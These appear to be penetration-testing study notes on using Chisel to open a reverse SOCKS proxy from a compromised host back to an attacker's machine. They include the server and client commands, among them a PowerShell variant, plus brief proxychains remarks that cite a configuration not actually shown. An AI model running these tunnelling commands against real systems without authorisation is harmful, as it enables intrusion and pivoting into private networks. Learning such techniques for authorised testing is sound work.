## What is Chisel?
- Chisel is a great tool which can be used to quickly and easily setup a tunneled proxy or remote port forward through a compromised system, `regardless of if you have SSH access or not`
- We must have an appropriate copy of a chisel binary on both `attacking and compromised machine as well.`
- Copy the file to your target with your preferred file transfer method.

The chisel binary has two modes: 
1. client  
2. server


### Reverse SOCKS proxy
- We'll now use chisel and set up a reverse SOCKS proxy 
- This connects back from a compromised server to a listener waiting on our attacker machine.


## Step 1
On our own attack box, we use a command like this to setup a listener:-
```
chisel server -p <listen_port> --reverse & 
```


## Step 2
On compromised host, we use a command which connects back to the listener on our attacking box, completing the proxy.
```
./chisel client <ip of attack box>:<listen port> R:socks &
```

OR 

```powershell
Start-Job {C:\Users\chisel.exe client ip:port R:socks}
```
- Notice that, despite connecting back to out listener port, the actual proxy has been opened on port 1080.
- As such, we will be using port 1080 when sending data through the proxy 

The use of `R:socks` in command 
- `R` is prefixed to remotes (argument that determines what is forwarded or proxied -- in this case we setup a proxy) when connecting to a chisel server that has been started in reverse mode.
	- It essentially tells the chisel client that server anticipates the proxy or port forward to be made at the client side 


Proxychains setup
- When sending data through these proxies, we need to setup our proxychains configuration.
- A Chisel uses a SOCKS5 proxy, we will need to change line from socks4 to socks5 proxy.

## Note
- `The above config is for a reverse SOCKS proxy - as mentioned previously, proxy opens on port 1080 rather than specificed listening port.`
- `If you use proxychains with a forward proxy then port should be set to whichever port you opened (port 1337)`


